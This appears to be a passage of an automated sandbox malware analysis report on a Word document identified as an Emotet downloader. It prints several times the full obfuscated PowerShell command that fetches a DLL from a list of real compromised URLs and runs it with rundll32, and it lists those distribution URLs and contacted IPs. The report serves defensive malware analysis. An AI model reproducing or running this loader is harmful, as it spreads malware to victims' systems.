    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

    Data Obfuscation:

    Document contains an embedded VBA with many string operations indicating source code obfuscation
    Source: ~DF0E259767A8C316A9.TMP.0.dr | Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
    Suspicious powershell command line found
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Obfuscated command line found
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4825
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2541
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000006.00000003.727850715.0000000005892000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
    Source: powershell.exe, 00000006.00000003.749926662.0000000009B4A000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'>f$
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmp | Binary or memory string: c:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000006.00000003.750063979.000000000817F000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion:

    Document contains VBA stomped code (only p-code) potentially bypassing AV detection
    Source: 704.doc | OLE indicator, VBA stomping: true
    Source: ~DF0E259767A8C316A9.TMP.0.dr | OLE indicator, VBA stomping: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762 Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

    Stealing of Sensitive Information:

    Yara detected Emotet Downloader
    Source: Yara match | File source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt, type: DROPPED

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Command and Scripting Interpreter 11 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scripting 32 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 21 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 13 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | Virtualization/Sandbox Evasion 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 32 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 1 | Proc Filesystem | System Information Discovery 12 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Extra Window Memory Injection 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

    Behavior Graph


    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    704.doc | 100% | Joe Sandbox ML

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP | 100% | Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://primtalent.com/wp-admin/9yt1u/ | 0% | Avira URL Cloud | safe
    http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/ | 0% | Avira URL Cloud | safe
    https://roaming.edog. | 0% | URL Reputation | safe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/XnG/.Splitplits/ | 0% | Avira URL Cloud | safe
    https://cdn.entity. | 0% | URL Reputation | safe
    https://powerlift.acompli.net | 0% | URL Reputation | safe
    https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
    https://cortana.ai | 0% | URL Reputation | safe
    http://huskysb.com4 | 0% | Avira URL Cloud | safe
    https://api.aadrm.com/ | 0% | URL Reputation | safe
    https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
    http://ckfoods.net/wp-admin/wPInm2rgMu/ | 100% | Avira URL Cloud | malware
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
    https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
    https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
    https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
    https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
    https://api.aadrm.com | 0% | URL Reputation | safe
    https://go.micro | 0% | URL Reputation | safe
    https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
    https://www.odwebp.svc.ms | 0% | URL Reputation | safe
    http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ | 100% | Avira URL Cloud | malware
    https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
    https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
    https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
    https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
    https://ncus.contentsync. | 0% | URL Reputation | safe
    http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ | 100% | Avira URL Cloud | malware
    https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/.Split/p | 0% | Avira URL Cloud | safe
    http://huskysb.com/cgi-sys/suspendedpage.cgi | 0% | Avira URL Cloud | safe
    https://wus2.contentsync. | 0% | URL Reputation | safe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/tp | 0% | Avira URL Cloud | safe
    https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/deXnG/.Split.Split | 0% | Avira URL Cloud | safe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/h | 0% | Avira URL Cloud | safe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/ | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    primtalent.com | 148.72.96.3 | true | true | | unknown
    huskysb.com | 60.248.112.145 | true | true | | unknown

        Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://primtalent.com/wp-admin/9yt1u/ | true | Avira URL Cloud: safe | unknown
    http://huskysb.com/cgi-sys/suspendedpage.cgi | false | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

                                                                                                    https://clients.config.office.net/user/v1.0/iosED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                      high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                          high
                                                                                                          http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/tppowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.netED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policiesED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v2/initED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                          high
                                                                                                                          http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/deXnG/.Split.Splitpowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://storage.live.com/clientlogs/uploadlocationED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                            high
                                                                                                                            http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/hpowershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://outlook.office365.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                                                                                                                                    high
                                                                                                                                    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drtrue
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown

                                                                                                                                    Contacted IPs


                                                                                                                                    Public

IP              Domain          Country                          ASN    ASN Name                               Malicious
60.248.112.145  huskysb.com     Taiwan; Republic of China (ROC)  3462   HINETDataCommunicationBusinessGroupTW  true
148.72.96.3     primtalent.com  United States                    26496  AS-26496-GO-DADDY-COM-LLCUS            true

                                                                                                                                    General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 526268
Start date: 22.11.2021
Start time: 13:21:39
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 9s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 704.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@8/18@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 2
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.88.38, 52.109.8.23
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 6312 because it is empty
